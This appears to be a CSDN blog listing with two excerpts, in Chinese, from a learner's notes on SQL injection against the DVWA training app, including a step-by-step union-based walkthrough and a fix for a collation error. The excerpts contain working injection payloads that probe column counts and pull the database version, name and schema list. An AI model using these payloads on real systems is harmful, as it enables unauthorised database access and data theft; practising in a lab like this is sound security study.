![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
SQL Injection
VVeaker
CSDN基本不会再更新了,知识星球
展开
-
SQL Injection学习过程
DVWA 等级:low1.判断是否存在注入1‘ or 1=1 #2.判断有多少字段1' union select 1,2,3,4,5 #1' union select 1,2,3 #1' union select 1,2 #说明有两个字段3.判断回显位置1'union select 222,666 #4.查询版本号和当前数据库库名1'union select version(),database() #有时候版本不一样,注入构造的语句也不一样5.查询所有数据库的库名原创 2021-03-13 10:26:14 · 114 阅读 · 0 评论 -
解决Illegal mix of collations for operation ‘UNION‘
在dvwa测试sql注入发现的问题在查询1,2的时候可以正常回显当换成下面这条查看所有数据库库名的时候就报错了1'union SELECT 1,GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.SCHEMATA #然后我去后台查询了一下发现如下utf8和latin1不是相同的字符集才会报错然后去修改了字符集修改后是这个样子的...原创 2021-03-13 09:09:39 · 956 阅读 · 2 评论